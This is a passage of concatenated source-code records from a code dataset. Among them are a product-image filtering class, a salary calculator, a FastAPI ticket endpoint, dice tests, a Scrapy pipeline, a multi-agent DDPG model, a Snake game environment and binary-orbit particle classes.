print(modified_path)\r\n print(e)\r\n if score1_0 > 0.8 and score1 > 0.8 and score3 < 0.2 and score4 < 0.1 and score5 < 0.2:\r\n pic_type = 2 # qualifies as a main image\r\n res_path = modified_path\r\n elif score4 < 0.1 and score5 < 0.2:\r\n pic_type = 1 # not a main image, but acceptable as a sub-image\r\n res_path = modified_path\r\n else:\r\n res_path = modified_path\r\n else:\r\n if score1_0 > 0.8 and score3 < 0.2 and score4 < 0.1 and score5 < 0.2:\r\n pic_type = 2 # qualifies as a main image\r\n res_path = im_path\r\n elif score4 < 0.1 and score5 < 0.2:\r\n pic_type = 1 # not a main image, but acceptable as a sub-image\r\n res_path = im_path\r\n else:\r\n res_path = im_path\r\n\r\n # for images the model predicts as white-background, check whether the outermost columns are fully white\r\n if bg_color == 'white' and len(res_path) > 0:\r\n try:\r\n gray = np.array(Image.open(res_path).convert('L')).astype('uint8')\r\n\r\n # test whether the left and right columns are entirely white\r\n if np.where(gray[:, 1] == 255, 0, 1).sum() * 100 > gray.shape[0] or np.where(gray[:, 0] == 255, 0,\r\n 1).sum() * 100 > gray.shape[\r\n 0] or np.where(gray[:, gray.shape[1] - 2] == 255, 0, 1).sum() * 100 > gray.shape[0] or np.where(\r\n gray[:, gray.shape[1] - 1] == 255, 0, 1).sum() * 100 > gray.shape[0]:\r\n bg_color = 'unknown'\r\n except Exception as e:\r\n print(e)\r\n bg_color = 'unknown'\r\n\r\n return bg_color, pic_type, res_path\r\n\r\n\r\n# public interface\r\n#callable class\r\nclass GetValidPics(object):\r\n \"\"\"Filter and fix product images\r\n\r\n Args:\r\n model_path: path to the scoring model\r\n \"\"\"\r\n\r\n def __init__(self, model_path='./param_best.pth', similarity_model='./squeezenet1_1-f364aa15.pth', use_gpu=False, device_id=0):\r\n print('prepare model!')\r\n # load onto the CPU\r\n self.model = multi_task_resnet.MultiTaskResnet()\r\n self.use_gpu = False\r\n self.device_id = device_id\r\n if use_gpu and torch.cuda.is_available():\r\n self.use_gpu = True\r\n if self.use_gpu:\r\n self.model.load_state_dict(torch.load(model_path))\r\n self.model = self.model.cuda()\r\n else:\r\n self.model.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))\r\n self.model = self.model.eval()\r\n print('load model finished!')\r\n self.compute_similarity = pic_similarity.ComputeSimilarity(model_path=similarity_model, usegpu=use_gpu)\r\n\r\n\r\n def __call__(self, skuid, url_list):\r\n \"\"\"\r\n Args:\r\n url_list: [str1,str2,str3,...] 
,str(url:is_primary)\r\n\r\n Returns:\r\n a list,[url1,url2,url3] or []\r\n \"\"\"\r\n print('processing skuid:', skuid)\r\n\r\n # local cache\r\n tmppath = '/data1/tmp/'\r\n if os.path.exists(tmppath) == False:\r\n os.makedirs(tmppath)\r\n reslist = []\r\n main_image_bg = 'unknown'\r\n\r\n # collect the URLs, taking only the most recent images\r\n srclist = []\r\n for info in url_list:\r\n urlinfo = info.split(':')\r\n if urlinfo[1] == '1' and len(srclist) > 1:\r\n break\r\n srclist.append(urlinfo[0])\r\n t1 = cv2.getTickCount()\r\n # download images into the local cache\r\n skupath = os.path.join(tmppath, skuid)\r\n if os.path.exists(skupath) == False:\r\n os.makedirs(skupath)\r\n pic_dict = downloadimgs(skupath, srclist)\r\n t2 = cv2.getTickCount()\r\n print('download time:%.2f s' % ((t2 - t1) / cv2.getTickFrequency()))\r\n\r\n t1 = cv2.getTickCount()\r\n # returns a list of image paths of length 0-3: [main image, sub-image 1, sub-image 2] (when available)\r\n # paths are the original urls; if the main image was modified, its path is the newly uploaded one\r\n main_pic_list = []\r\n sub_pic_list = []\r\n main_pic_bg = []\r\n\r\n # process every image\r\n for pic in pic_dict.keys():\r\n # i.e. stop as soon as 5 valid images have been obtained\r\n if len(main_pic_list) > 0 and len(main_pic_list)+len(sub_pic_list) > 4:\r\n break\r\n # decide whether the image is suitable, and fix it if needed\r\n bg_color, pic_type, res_path = evaluate_pic(skupath, pic, self.model, self.use_gpu)\r\n if pic_type == 2:\r\n main_pic_list.append(res_path)\r\n main_pic_bg.append(bg_color)\r\n elif pic_type == 1:\r\n sub_pic_list.append(res_path)\r\n md5_str = ''\r\n # sub-images are only compared once at least one image qualifies as the main image\r\n if len(main_pic_list) > 0:\r\n valid_pics = []\r\n # pick the main image\r\n main_image_bg = main_pic_bg[0]\r\n valid_pics.append(main_pic_list[0])\r\n total_pics = main_pic_list + sub_pic_list\r\n total_num = len(total_pics)\r\n\r\n # remove duplicate images\r\n for i in range(1, total_num):\r\n if len(valid_pics) >= 3:\r\n break\r\n have_similar_pic = False\r\n for valid_pic in valid_pics:\r\n if self.compute_similarity(valid_pic, total_pics[i]):\r\n have_similar_pic = True\r\n break\r\n if have_similar_pic==False:\r\n valid_pics.append(total_pics[i])\r\n\r\n for i in range(min(3, len(valid_pics))):\r\n # if valid_pics[i] in pic_dict.keys():\r\n # url = pic_dict[valid_pics[i]]\r\n # else:\r\n # url = uploadImage(valid_pics[i])\r\n # reslist.append(url)\r\n # local testing: output the local paths\r\n reslist.append(valid_pics[i])\r\n md5, _ = File_md5(valid_pics[i])\r\n md5_str = md5_str + str(md5)\r\n # delete the cache\r\n # if os.path.exists(skupath) == True:\r\n # shutil.rmtree(skupath)\r\n res_md5 = hashlib.md5(md5_str.encode('utf-8')).hexdigest()\r\n t2 = cv2.getTickCount()\r\n print('process time:%.2f s' % ((t2 - t1) / cv2.getTickFrequency()))\r\n return main_image_bg, reslist, res_md5\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"pic_evaluator/sku_pic_filter/pic_filter_v2.py","file_name":"pic_filter_v2.py","file_ext":"py","file_size_in_byte":22108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"70473941","text":"#037 - Salário Mensal - Modo Completo\n\nsBruto = int(input('Salário Bruto: '))\nIR = (11/100)*sBruto\nINSS = (8/100)*sBruto\nSind = (5/100)*sBruto\nsLiq = sBruto - IR - INSS - Sind\n\nhoras = 8\nsalarioDia = sBruto/30\nsalarioHora = salarioDia/horas\nhMensal = horas*30\n\nprint(f'Salário Bruto: R${sBruto:.2f} ---> Salário Líquido: R${sLiq:.2f}')\nprint(f'Horas Mensais: {hMensal}')\nprint(f'Salário-Dia (Calculado usando o Salário Bruto como referência: R${salarioDia:.2f}')\nprint(f'Salário-Hora(Salário Bruto como Referência): R${salarioHora:.2f}')\n","sub_path":"Exercícios Gerais/037 - Salário Mensal.py","file_name":"037 - Salário 
Mensal.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"323094892","text":"import time\nfrom typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException, Body\nfrom pydantic import parse_obj_as, BaseModel, Field\n\nfrom ..db import tickets, services\nfrom ..lib import with_auth\nfrom ..typings.service import ServiceModel\nfrom ..typings.ticket import TicketModel\nfrom ..typings.token import TokenModel\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=List[TicketModel], response_model_exclude={\"_id\"}, name=\"My Tickets\")\ndef mine(token: TokenModel = Depends(with_auth)):\n try:\n data = parse_obj_as(List[TicketModel], [*tickets.find({\"owner\": token.id})])\n except ValueError:\n raise HTTPException(status_code=404, detail=\"user.notfound\")\n\n return data\n\n\nclass PurchaseRequestModel(BaseModel):\n service: str = Field(\n description=\"Внутренний ID сервиса/аттракциона\",\n max_length=16,\n min_length=16,\n )\n\n count: int = Field(\n description=\"Количество билетов\",\n gt=0\n )\n\n isForChild: bool = Field(\n description=\"Является ли билет детским\"\n )\n\n\n@router.post(\"/\", response_model_exclude={\"_id\"}, name=\"Purchase Ticket\", status_code=201)\ndef purchase(token: TokenModel = Depends(with_auth), data: PurchaseRequestModel = Body(..., embed=False)):\n try:\n serv: ServiceModel = parse_obj_as(ServiceModel, services.find_one({\"sid\": data.service}))\n except ValueError as err:\n print(err)\n raise HTTPException(status_code=404, detail=\"service.notfound\")\n\n ticket = TicketModel(service=data.service, uses=data.count, owner=token.id, isForChild=data.isForChild,\n createdAt=time.time(), expiresAt=time.time() + serv.expireTime)\n\n tickets.insert_one(ticket.dict())\n\n return ticket\n","sub_path":"src/apis/tickets.py","file_name":"tickets.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"484516533","text":"from functools import partial\n\nfrom dragn.dice import D4, D6, D8, D10, D12, D20, roller\nfrom dragn.dice.die_and_roller import roller\n\n\nclass TestRoller:\n def test_roller_very_naive(self):\n fake_randomness = lambda max_value, randomness: 4\n\n result = roller(0, randomness=fake_randomness)\n\n assert result == 4\n\n def test_default_roller(self):\n result = roller(6)\n\n assert result in range(1, 7)\n\n def test_custom_roller_with_partial(self):\n die = partial(roller, 6)\n\n assert die() in range(1, 7)\n\n\nclass TestDie:\n def test_one_configured_die(self):\n assert D4() in range(1, 5)\n\n def test_all_configured_dice(self):\n configured_dice = {\n D4: range(1, 5),\n D6: range(1, 7),\n D8: range(1, 9),\n D10: range(1, 11),\n D12: range(1, 13),\n D20: range(1, 21),\n }\n for die, results_range in configured_dice.items():\n assert die() in results_range\n","sub_path":"dragn/tests/test_dice.py","file_name":"test_dice.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"86967390","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\n\nclass WanyiyunPipeline(object):\n def __init__(self):\n client = pymongo.MongoClient('localhost',27017)\n wanyi = client['wanyiyun']\n songs = 
wanyi['hotcomment']\n self.post = songs\n\n def process_item(self, item, spider):\n info = dict(item)\n self.post.insert(info)\n return item\n","sub_path":"pilelines.py","file_name":"pilelines.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"587287310","text":"import torch.nn as nn\nfrom utilities.util import *\nfrom models.model import Model\nfrom learning_algorithms.ddpg import DDPG\nfrom critics.mlp_critic import MLPCritic\n\n\n\nclass IDDPG(Model):\n def __init__(self, args, target_net=None):\n super(IDDPG, self).__init__(args)\n self.construct_model()\n self.apply(self.init_weights)\n if target_net != None:\n self.target_net = target_net\n self.reload_params_to_target()\n self.rl = DDPG(self.args)\n\n def construct_value_net(self):\n if self.args.agent_id:\n input_shape = self.obs_dim + self.act_dim + self.n_\n else:\n input_shape = self.obs_dim + self.act_dim\n output_shape = 1\n if self.args.shared_params:\n self.value_dicts = nn.ModuleList( [ MLPCritic(input_shape, output_shape, self.args) ] )\n else:\n self.value_dicts = nn.ModuleList( [ MLPCritic(input_shape, output_shape, self.args) for _ in range(self.n_) ] )\n\n def construct_model(self):\n self.construct_value_net()\n self.construct_policy_net()\n\n def value(self, obs, act):\n # obs_shape = (b, n, o)\n # act_shape = (b, n, a)\n batch_size = obs.size(0)\n\n # add agent id\n if self.args.agent_id:\n agent_ids = th.eye(self.n_).unsqueeze(0).repeat(batch_size, 1, 1).to(self.device) # shape = (b, n, n)\n obs = th.cat( (obs, agent_ids), dim=-1 ) # shape = (b, n, o+n)\n\n if self.args.shared_params:\n obs = obs.contiguous().view(batch_size*self.n_, -1) # shape = (b*n, o+n/o)\n act = act.contiguous().view(batch_size*self.n_, -1) # shape = (b*n, a)\n agent_value = self.value_dicts[0]\n inputs = th.cat([obs, act], dim=-1)\n values, _ = agent_value(inputs, None)\n values = values.contiguous().view(batch_size, self.n_, -1)\n else:\n inputs = th.cat([obs, act], dim=-1) # shape = (b, n, o+a+n/o+a)\n values = []\n for i, agent_value in enumerate(self.value_dicts):\n value, _ = agent_value(inputs[:, i, :], None)\n values.append(value)\n values = th.stack(values, dim=1)\n\n return values\n\n def get_actions(self, state, status, exploration, actions_avail, target=False, last_hid=None):\n target_policy = self.target_net.policy if self.args.target else self.policy\n if self.args.continuous:\n means, log_stds, hiddens = self.policy(state, last_hid=last_hid) if not target else target_policy(state, last_hid=last_hid)\n if means.size(-1) > 1:\n means_ = means.sum(dim=1, keepdim=True)\n log_stds_ = log_stds.sum(dim=1, keepdim=True)\n else:\n means_ = means\n log_stds_ = log_stds\n actions, log_prob_a = select_action(self.args, means_, status=status, exploration=exploration, info={'log_std': log_stds_})\n restore_mask = 1. 
- (actions_avail == 0).to(self.device).float()\n restore_actions = restore_mask * actions\n action_out = (means, log_stds)\n else:\n logits, _, hiddens = self.policy(state, last_hid=last_hid) if not target else target_policy(state, last_hid=last_hid)\n logits[actions_avail == 0] = -9999999\n actions, log_prob_a = select_action(self.args, logits, status=status, exploration=exploration)\n restore_actions = actions\n action_out = logits\n return actions, restore_actions, log_prob_a, action_out, hiddens\n\n def get_loss(self, batch):\n policy_loss, value_loss, action_out = self.rl.get_loss(batch, self, self.target_net)\n return policy_loss, value_loss, action_out\n","sub_path":"models/iddpg.py","file_name":"iddpg.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"399254677","text":"import random\nfrom utils import *\nfrom tensorflow import keras\nfrom skimage import transform\n#########\n# COLORS\n#########\n\nGREEN = (0, 255, 0)\nHEAD_YELLOW = (255, 255, 0)\nBODY_YELLOW = (255, 255, 102)\nWALL = (255, 0, 0)\nBLACK = (0, 0, 0)\n\nGREEN_ID = 3\nHEAD_YELLOW_ID = 1\nBODY_YELLOW_ID = 2\nWALL_ID = 4\nBLACK_ID = 0\n\n#############################\n\n\nclass SnakeEnvironment:\n\tdef __init__(self, width, length, snake_size, wall_size):\n\t\tself.actions_space = 4\n\t\tassert width%snake_size == 0 and length%snake_size == 0, \"width and length must be a multiple of snake_size\"\n\t\tself.wall_size = wall_size\n\t\tself.width = width - 2*wall_size\n\t\tself.length = length - 2*wall_size\n\t\tself.states_space = np.zeros((width, length), dtype=np.uint8)\n\n\t\tself.states_space[:, 0:self.wall_size] = 4\n\t\tself.states_space[:, -self.wall_size:] = 4\n\t\tself.states_space[-self.wall_size:, :] = 4\n\t\tself.states_space[0:self.wall_size, :] = 4\n\n\t\tself.snake_size = snake_size\n\t\tself.score = 0\n\n\t\tself.possible_x = [i for i in range(wall_size, self.width, snake_size)]\n\t\tself.possible_y = [i for i in range(wall_size, self.length, snake_size)]\n\n\t\tself.head_x = random.choice(self.possible_x)\n\t\tself.head_y = random.choice(self.possible_y)\n\t\tself.snake_head = [self.head_x, self.head_y]\n\t\tself.snake_list = [self.snake_head]\n\t\tself.foodx, self.foody = add_food(self.possible_x, self.possible_y, self.snake_list)\n\n\t\tself.firstcall = True\n\t\tself.env_clock = None\n\t\tself.screen = None\n\t\tself.score_font = None\n\n\tdef reset(self):\n\t\tself.head_x = random.choice(self.possible_x)\n\t\tself.head_y = random.choice(self.possible_y)\n\t\tself.snake_head = [self.head_x, self.head_y]\n\t\tself.snake_list = [self.snake_head]\n\n\t\tsecond_x = 2*self.wall_size if self.head_x == self.wall_size else self.head_x - self.wall_size\n\t\tsecond_y = self.head_y\n\t\tchunck = [second_x, second_y]\n\t\tself.snake_list.insert(0, chunck)\n\n\t\tself.foodx, self.foody = add_food(self.possible_x, self.possible_y, self.snake_list)\n\n\t\tself.board_status = np.copy(self.states_space)\n\n\t\tfor i in range(self.snake_size):\n\t\t\tfor j in range(self.snake_size):\n\t\t\t\tself.board_status[self.foody+i][self.foodx+j] = GREEN_ID\n\t\t\t\tself.board_status[self.snake_head[1]+i][self.snake_head[0]+j] = HEAD_YELLOW_ID\n\t\t\t\tfor b in self.snake_list[:-1]:\n\t\t\t\t\tself.board_status[b[1]+i][b[0]+j] = BODY_YELLOW_ID\n\n\t\tself.score = 0\n\n\t\t# self.board_status = scale_lumininance(self.board_status)/255.0\n\t\t# self.board_status = transform.resize(self.board_status, (84, 84))\n\t\treturn 
self.board_status\n\n\tdef observation(self):\n\t\tself.board_status = np.copy(self.states_space)\n\t\tfor i in range(self.snake_size):\n\t\t\tfor j in range(self.snake_size):\n\t\t\t\tself.board_status[self.foody+i][self.foodx+j] = GREEN_ID\n\t\t\t\tself.board_status[self.snake_head[1]+i][self.snake_head[0]+j] = HEAD_YELLOW_ID\n\n\t\t# self.board_status = scale_lumininance(self.board_status)/255.0\n\n\t\treturn self.board_status\n\n\tdef get_state_map(self):\n\t\tself.board_status = np.copy(self.states_space)\n\n\t\tfor i in range(self.snake_size):\n\t\t\tfor j in range(self.snake_size):\n\t\t\t\tself.board_status[self.foody + i][self.foodx + j] = GREEN_ID\n\t\t\t\tfor b in self.snake_list[:-1]:\n\t\t\t\t\tself.board_status[b[1]+i][b[0]+j] = BODY_YELLOW_ID\n\n\t\tif 0 <= self.snake_head[0] < self.width+2*self.wall_size and 0 <= self.snake_head[1] < self.length+2*self.wall_size:\n\t\t\tfor i in range(self.snake_size):\n\t\t\t\tfor j in range(self.snake_size):\n\t\t\t\t\tself.board_status[self.snake_head[1] + i][self.snake_head[0] + j] = HEAD_YELLOW_ID\n\n\t\t# self.board_status = scale_lumininance(self.board_status)/255.0\n\t\t# self.board_status = transform.resize(self.board_status, (84, 84))\n\t\treturn self.board_status\n\n\tdef step(self, action):\n\t\tterminal = False\n\t\tadd_block = False\n\t\tif action == 3:\n\t\t\tx_change = -self.snake_size\n\t\t\ty_change = 0\n\t\telif action == 1:\n\t\t\tx_change = self.snake_size\n\t\t\ty_change = 0\n\t\telif action == 0:\n\t\t\ty_change = -self.snake_size\n\t\t\tx_change = 0\n\t\telif action == 2:\n\t\t\ty_change = self.snake_size\n\t\t\tx_change = 0\n\n\t\tself.head_x += x_change\n\t\tself.head_y += y_change\n\t\tself.snake_head = [self.head_x, self.head_y]\n\t\tself.snake_list.append(self.snake_head)\n\n\t\tif self.head_x >= self.width+self.wall_size or self.head_x < self.wall_size or self.head_y >= self.length + self.wall_size or self.head_y < self.wall_size:\n\t\t\tterminal = True\n\t\t\treward = -1.0\n\n\t\tfor x in self.snake_list[:-1]:\n\t\t\tif x == self.snake_head:\n\t\t\t\tterminal = True\n\t\t\t\treward = -1.0\n\n\t\tif not terminal:\n\t\t\tif self.head_x == self.foodx and self.head_y == self.foody:\n\t\t\t\tself.foodx, self.foody = add_food(self.possible_x, self.possible_y, self.snake_list)\n\t\t\t\tadd_block = True\n\t\t\t\tself.score += 1\n\t\t\t\treward = 10.0#*(self.score)\n\t\t\telse:\n\t\t\t\treward = 0\n\n\t\tif not add_block:\n\t\t\tdel self.snake_list[0]\n\n\t\tnew_state = self.get_state_map()\n\n\t\treturn new_state, reward, terminal\n\n\tdef render(self):\n\t\tif self.firstcall:\n\t\t\tself.firstcall = False\n\t\t\tpygame.init()\n\t\t\tself.env_clock = pygame.time.Clock()\n\t\t\tself.screen = pygame.display.set_mode((self.width+2*self.wall_size, self.length+2*self.wall_size))\n\t\t\tself.score_font = pygame.font.SysFont(\"comicsansms\", 15)\n\t\t\tpygame.display.set_caption('Snake game test')\n\n\t\tself.display_screen()\n\n\n\tdef display_screen(self):\n\t\tself.screen.fill(WALL)\n\t\tpygame.draw.rect(self.screen, BLACK, [self.wall_size, self.wall_size, self.width, self.length])\n\t\tvalue = self.score_font.render(\"Your Score: \" + str(self.score), True, HEAD_YELLOW)\n\t\tself.screen.blit(value, [7, 7])\n\t\tpygame.draw.rect(self.screen, GREEN, [self.foodx, self.foody, self.snake_size, self.snake_size])\n\t\t# display_snake(self.screen, MY_YELLOW, self.snake_size, self.snake_list)\n\t\tdisplay_snake(self.screen, HEAD_YELLOW, BODY_YELLOW, self.snake_size, 
self.snake_list)\n\t\tpygame.display.update()\n\t\tself.env_clock.tick(10)\n","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"550144699","text":"# read snapshot and obtain multiple systems\nimport collections\nfrom scipy import spatial as sp\nfrom .base import *\n\nclass SimpleParticle(DictNpArrayMix):\n \"\"\" Simple particle class with only mass, postion, velocity and r2\n \"\"\"\n def __init__(self, _dat=None, _offset=int(0), _append=False, **kwargs):\n keys = [['mass',1], ['pos',3], ['vel',3]]\n DictNpArrayMix.__init__(self, keys, _dat, _offset, _append, **kwargs)\n\n def calcR2(self):\n \"\"\" calculate distance square\n \"\"\"\n if (not 'r2' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['r2',1])\n self.r2 = vecDot(self.pos,self.pos)\n\n def calcEkin(self):\n \"\"\" calculate kinetic energy\n \"\"\"\n if (not 'ekin' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['ekin',1])\n self.ekin = 0.5*vecDot(self.vel,self.vel)*self.mass\n\n def correctCenter(self, cm_pos, cm_vel):\n self.pos -= cm_pos\n self.vel -= cm_vel\n\nclass Particle(SimpleParticle):\n \"\"\" Particle class \n \"\"\"\n def __init__ (self, _dat=None, _offset=int(0), _append=False, **kwargs):\n keys_se = [['radius',1],['dm',1],['time_record',1],['time_interrupt',1],['binary_state',1]]\n keys_bse = [['s_type',1],['s_mass0',1],['s_mass',1],['s_rad',1],['s_mcore',1],['s_rcore',1],['s_spin',1],['s_epoch',1],['s_time',1],['s_lum',1]]\n keys_std = [['r_search',1], ['id',1], ['mass_bk',1], ['status',1], ['r_in',1], ['r_out',1], ['acc_soft',3], ['pot',1], ['pot_soft',1], ['n_nb',1]]\n keys=keys_std\n if ('interrupt_mode' in kwargs.keys()):\n if (kwargs['interrupt_mode']=='base'):\n keys = keys_se+keys_std\n elif (kwargs['interrupt_mode']=='bse'):\n keys = keys_se+keys_bse+keys_std\n \n SimpleParticle.__init__(self, _dat, _offset, _append, **kwargs)\n DictNpArrayMix.__init__(self, keys, _dat, _offset+self.ncols, True, **kwargs)\n\n def calcEtot(self):\n if (not 'etot' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['etot',1])\n self.etot = self.ekin + self.mass*self.pot\n\ndef calculateParticleCMDict(pcm, _p1, _p2):\n \"\"\" calculate cm of particle pair\"\"\"\n if (issubclass(type(_p1), SimpleParticle)) & (issubclass(type(_p2),SimpleParticle)):\n pcm['mass'] = _p1.mass + _p2.mass\n pcm['pos'] = np.array(list(map(lambda m1,x1,m2,x2:(m1*x1+m2*x2)/(m1+m2), _p1.mass, _p1.pos, _p2.mass, _p2.pos)))\n pcm['vel'] = np.array(list(map(lambda m1,x1,m2,x2:(m1*x1+m2*x2)/(m1+m2), _p1.mass, _p1.vel, _p2.mass, _p2.vel)))\n elif (isinstance(_p1, collections.OrderedDict)) & (isinstance(_p2,collections.OrderedDict)) | (isinstance(_p1, dict)) & (isinstance(_p2, dict)):\n pcm['mass'] = _p1['mass'] + _p2['mass']\n pcm['pos'] = np.array(list(map(lambda m1,x1,m2,x2:(m1*x1+m2*x2)/(m1+m2), _p1['mass'], _p1['pos'], _p2['mass'], _p2['pos'])))\n pcm['vel'] = np.array(list(map(lambda m1,x1,m2,x2:(m1*x1+m2*x2)/(m1+m2), _p1['mass'], _p1['vel'], _p2['mass'], _p2['vel'])))\n else:\n raise ValueError('Initial fail, date type should be Particle or collections.OrderDict, given',type(_p1))\n\nclass Binary(DictNpArrayMix):\n \"\"\" Binary class\n \"\"\"\n def __init__ (self, _p1=None, _p2=None, _offset=int(0), _append=False, **kwargs):\n \"\"\"\n simple_mode: only calculate semi and ecc\n \"\"\"\n G=1\n simple_mode=True\n member_particle_type=SimpleParticle\n \n if 
'G' in kwargs.keys(): G=kwargs['G']\n if 'simple_mode' in kwargs.keys(): simple_mode=kwargs['simple_mode']\n if 'member_particle_type' in kwargs.keys(): member_particle_type=kwargs['member_particle_type']\n\n if (issubclass(type(_p1), SimpleParticle)) & (issubclass(type(_p2),SimpleParticle)):\n member_particle_type = type(_p1)\n if (simple_mode): \n self.keys = [['mass',1],['pos',3],['vel',3],['rrel',1],['semi',1],['ecc',1],['p1',member_particle_type], ['p2', member_particle_type]]\n self.particleToSemiEcc(_p1, _p2, G)\n self.ncols= int(10)\n else:\n self.keys = [['mass',1],['pos',3],['vel',3],['m1',1],['m2',1],['rrel',1],['semi',1],['am',3],['L',3],['eccvec',3],['incline',1],['rot_horizon',1],['ecc',1],['rot_self',1],['ecca',1],['period',1],['t_peri',1],['p1', member_particle_type],['p2', member_particle_type]]\n self.particleToBinary(_p1, _p2, G)\n self.ncols= int(27)\n self.p1 = _p1\n self.p2 = _p2\n self.size = _p1.size\n self.ncols += self.p1.ncols + self.p2.ncols\n elif (_p2==None):\n if (simple_mode):\n keys = [['mass',1],['pos',3],['vel',3],['rrel',1],['semi',1],['ecc',1],['p1',member_particle_type], ['p2', member_particle_type]]\n DictNpArrayMix.__init__(self, keys, _p1, _offset, _append, **kwargs)\n else:\n keys=[['mass',1],['pos',3],['vel',3],['m1',1],['m2',1],['rrel',1],['semi',1],['am',3],['L',3],['eccvec',3],['incline',1],['rot_horizon',1],['ecc',1],['rot_self',1],['ecca',1],['period',1],['t_peri',1],['p1', member_particle_type],['p2', member_particle_type]]\n DictNpArrayMix.__init__(self, keys, _p1, _offset, _append, **kwargs)\n else:\n raise ValueError('Initial fail, date type should be Particle (2), Binary (1) or no argument (0)')\n self.initargs = kwargs.copy()\n\n def calcEkin(self):\n \"\"\" calculate kinetic energy\n \"\"\"\n if (not 'ekin' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['ekin',1])\n self.ekin = 0.5*vecDot(self.vel,self.vel)*self.mass\n\n def calcEtot(self):\n if (not 'etot' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['etot',1])\n self.etot = self.ekin + self.mass*self.pot\n\n def calcR2(self, member_also=False):\n \"\"\" calculate distance square\n \"\"\"\n if (not 'r2' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['r2',1])\n self.r2 = vecDot(self.pos,self.pos)\n if (member_also):\n ncols = self.p1.ncols + self.p2.ncols\n self.p1.calcR2()\n self.p2.calcR2()\n ncols = self.p1.ncols + self.p2.ncols - ncols\n self.ncols += ncols\n\n def calcPot(self, G):\n pos_b1 = self.p1.pos\n pos_b2 = self.p2.pos\n m_b1 = self.p1.mass\n m_b2 = self.p2.mass\n dr = pos_b1-pos_b2\n dr2 = vecDot(dr,dr)\n invr = 1/np.sqrt(dr2)\n pot_b1 = self.p1.pot + G*m_b2*invr\n pot_b2 = self.p2.pot + G*m_b1*invr\n if (not 'pot' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['pot',1])\n self.pot = (m_b2*pot_b1 + m_b1*pot_b2)/self.mass\n \n def correctCenter(self, cm_pos, cm_vel):\n self.pos -= cm_pos\n self.vel -= cm_vel\n self.p1.correctCenter(cm_pos, cm_vel)\n self.p2.correctCenter(cm_pos, cm_vel)\n\n def particleToSemiEcc(self, _p1,_p2, _G):\n \"\"\"\n calculate binary semi-major axis and eccentricity from particle pairs\n _p1, _p2: data class\n _G: gravitational constant\n return: semi, ecc\n \"\"\"\n calculateParticleCMDict(self.__dict__, _p1, _p2)\n\n dr = (_p1.pos - _p2.pos)\n dv = (_p1.vel - _p2.vel)\n \n dr2 = (dr*dr).sum(axis=1)\n dv2 = (dv*dv).sum(axis=1)\n rvdot= (dr*dv).sum(axis=1)\n \n dr = np.sqrt(dr2)\n m = (_p1.mass+_p2.mass)\n semi = 1.0/(2.0/dr - dv2/(_G*m))\n\n dr_semi = 1.0 - dr/semi\n ecc = 
np.sqrt(dr_semi*dr_semi + rvdot*rvdot/(_G*m*semi))\n\n self.rrel = dr\n self.semi = semi\n self.ecc = ecc\n\n def particleToBinary(self, _p1, _p2, _G):\n \"\"\" \n Calculate binary orbit from particle pairs\n _p1, _p2: particle array of member 1 and 2\n _G: gravitaitonal constant\n return: binary dicto\n \"\"\"\n binary=self.__dict__\n \n def regular_sign(_a,_a_err):\n _a[(_a<0) & (_a>-_a_err)] *= -1\n \n f_err = 1e-2\n calculateParticleCMDict(binary, _p1, _p2)\n\n binary['m1'] = _p1.mass\n binary['m2'] = _p2.mass\n m_tot = binary['mass']\n Gm_tot = _G*m_tot\n \n dx = _p1.pos-_p2.pos\n dv = _p1.vel-_p2.vel\n dr2 = vecDot(dx,dx)\n dv2 = vecDot(dv,dv)\n rvdot= vecDot(dx,dv)\n dr = np.sqrt(dr2)\n binary['rrel'] = np.sqrt(dr2)\n \n inv_dr = 1.0 / binary['rrel']\n binary['semi'] = 1.0 / (2.0*inv_dr - dv2 / Gm_tot)\n binary['am'] = np.array(list(map(lambda x,y:np.cross(x,y),dx,dv)))\n dp = np.array(list(map(lambda m1,x1,m2,x2:m1*x1-m2*x2,_p1.mass,_p1.vel,_p2.mass,_p2.vel)))\n binary['L'] = np.array(list(map(lambda x,y:np.cross(x,y),dx,dp)))\n binary['eccvec'] = np.array(list(map(lambda v,am,gm,dx,dr:np.cross(v,am)/gm-dx/dr,dv,binary['am'],Gm_tot,dx,dr)))\n \n binary['incline'] = np.arctan2(np.sqrt(binary['am'][:,0]*binary['am'][:,0]+binary['am'][:,1]*binary['am'][:,1]),binary['am'][:,2])\n binary['rot_horizon'] = np.arctan2(binary['am'][:,0],-binary['am'][:,1])\n regular_sign(binary['am'][:,0],f_err)\n regular_sign(binary['am'][:,1],f_err)\n #binary['rot_horizon'][binary['rot_horizon']<0] += np.pi\n binary['rot_horizon'][binary['am'][:,1]==0.0]=0.0\n \n cosOMG = np.cos(binary['rot_horizon'])\n sinOMG = np.sin(binary['rot_horizon'])\n cosinc = np.cos(binary['incline'])\n sininc = np.sin(binary['incline'])\n \n pos_bar_x = dx[:,0]*cosOMG + 